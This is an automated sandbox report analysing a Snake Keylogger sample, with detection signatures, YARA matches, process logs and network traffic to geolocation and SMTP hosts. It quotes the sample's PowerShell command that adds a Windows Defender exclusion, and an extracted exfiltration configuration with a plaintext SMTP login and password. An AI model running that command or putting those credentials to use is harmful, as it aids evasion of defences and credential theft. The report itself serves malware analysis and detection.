Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
Analysis ID: 1482926
MD5: 967175d3aa79388fd8e84ccbf0b998c7
SHA1: 9bb041c883354d306a22ea0faf9c8deecd9f14c0
SHA256: 4607e74d7d23628239d2bdfc8d57236c09778517f758323e13fc9ca4092c07a7
Tags: exe

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe (PID: 2924 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe" MD5: 967175D3AA79388FD8E84CCBF0B998C7)
    • powershell.exe (PID: 3408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4408 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • cleanup
Malware family
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration (Snake Keylogger)
{"Exfil Mode": "SMTP", "Username": "grafik@erkanlarofis.com.tr", "Password": "19261926+-", "Host": "mail.erkanlarofis.com.tr", "Port": "587"}
Yara Overview

PCAP (Network Traffic)
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security

Memory Dumps
Source | Rule | Description | Author | Strings
00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x14347:$a1: get_encryptedPassword
  • 0x1462b:$a2: get_encryptedUsername
  • 0x14153:$a3: get_timePasswordChanged
  • 0x1424e:$a4: get_passwordField
  • 0x1435d:$a5: set_encryptedPassword
  • 0x159bb:$a7: get_logins
  • 0x1591e:$a10: KeyLoggerEventArgs
  • 0x15589:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x17ca0:$x1: $%SMTPDV$
  • 0x17d06:$x2: $#TheHashHere%&
  • 0x19369:$x3: %FTPDV$
  • 0x1945d:$x4: $%TelegramDv$
  • 0x15589:$x5: KeyLoggerEventArgs
  • 0x1591e:$x5: KeyLoggerEventArgs
  • 0x1938d:$m2: Clipboard Logs ID
  • 0x195ad:$m2: Screenshot Logs ID
  • 0x196bd:$m2: keystroke Logs ID
  • 0x19997:$m3: SnakePW
  • 0x19585:$m4: \SnakeKeylogger\
00000004.00000002.3267531741.0000000002B89000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
(table truncated; 11 entries in total)

Unpacked PEs
Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x12747:$a1: get_encryptedPassword
  • 0x12a2b:$a2: get_encryptedUsername
  • 0x12553:$a3: get_timePasswordChanged
  • 0x1264e:$a4: get_passwordField
  • 0x1275d:$a5: set_encryptedPassword
  • 0x13dbb:$a7: get_logins
  • 0x13d1e:$a10: KeyLoggerEventArgs
  • 0x13989:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x1a1ab:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x193dd:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x19810:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1a84f:$a5: \Kometa\User Data\Default\Login Data
0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hooking | ditekSHen
  • 0x13316:$s1: UnHook
  • 0x1331d:$s2: SetHook
  • 0x13325:$s3: CallNextHook
  • 0x13332:$s4: _hook
0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x160a0:$x1: $%SMTPDV$
  • 0x16106:$x2: $#TheHashHere%&
  • 0x17769:$x3: %FTPDV$
  • 0x1785d:$x4: $%TelegramDv$
  • 0x13989:$x5: KeyLoggerEventArgs
  • 0x13d1e:$x5: KeyLoggerEventArgs
  • 0x1778d:$m2: Clipboard Logs ID
  • 0x179ad:$m2: Screenshot Logs ID
  • 0x17abd:$m2: keystroke Logs ID
  • 0x17d97:$m3: SnakePW
  • 0x17985:$m4: \SnakeKeylogger\
(table truncated; 23 entries in total)

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ParentProcessId: 2924, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ProcessId: 3408, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ParentProcessId: 2924, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ProcessId: 3408, ProcessName: powershell.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 77.245.159.7, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, Initiated: true, ProcessId: 4040, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49730
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ParentProcessId: 2924, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ProcessId: 3408, ProcessName: powershell.exe
            No Snort rule has matched

Suricata IDS Alerts

Timestamp                        SID      Src Port  Dst Port  Proto  Classtype
2024-07-26T11:39:04.892508+0200  2803274  49706     80        TCP    Potentially Bad Traffic
2024-07-26T11:39:07.660193+0200  2803305  49713     443       TCP    Unknown Traffic
2024-07-26T11:39:11.471883+0200  2803305  49719     443       TCP    Unknown Traffic
2024-07-26T11:39:45.208289+0200  2044767  49734     587       TCP    A Network Trojan was detected
2024-07-26T11:39:06.402996+0200  2803305  49711     443       TCP    Unknown Traffic
2024-07-26T11:39:17.988539+0200  2022930  443       49724     TCP    A Network Trojan was detected
2024-07-26T11:39:35.846618+0200  2044767  49731     587       TCP    A Network Trojan was detected
2024-07-26T11:39:05.782404+0200  2803274  49706     80        TCP    Potentially Bad Traffic
2024-07-26T11:39:38.805311+0200  2044767  49732     587       TCP    A Network Trojan was detected
2024-07-26T11:38:56.204357+0200  2044767  49730     587       TCP    A Network Trojan was detected
2024-07-26T11:39:08.938329+0200  2803305  49715     443       TCP    Unknown Traffic
2024-07-26T11:39:07.032437+0200  2803274  49712     80        TCP    Potentially Bad Traffic
2024-07-26T11:39:55.942378+0200  2022930  443       49736     TCP    A Network Trojan was detected

            AV Detection

Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Avira: detected
Source: 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "grafik@erkanlarofis.com.tr", "Password": "19261926+-", "Host": "mail.erkanlarofis.com.tr", "Port": "587"}
Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Virustotal: Detection: 28%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Joe Sandbox ML: detected

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.0
Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: PHCd.pdbSHA256 | source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
Source: Binary string: PHCd.pdb | source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 4x nop then jmp 06ADD0CFh | 0_2_06ADD2A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 4x nop then jmp 00FAF20Eh | 4_2_00FAF01F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 4x nop then jmp 00FAFB98h | 4_2_00FAF01F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 4_2_00FAE540
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 4_2_00FAEB73
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 4_2_00FAED54

            Networking

Source: Yara match | File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.5:49730 -> 77.245.159.7:587
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: NIOBEBILISIMHIZMETLERITR
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: global traffic | TCP traffic: 192.168.2.5:49730 -> 77.245.159.7:587
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: mail.erkanlarofis.com.tr
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgp
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erkanlarofis.com.tr
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.erkanlarofis.com.tr
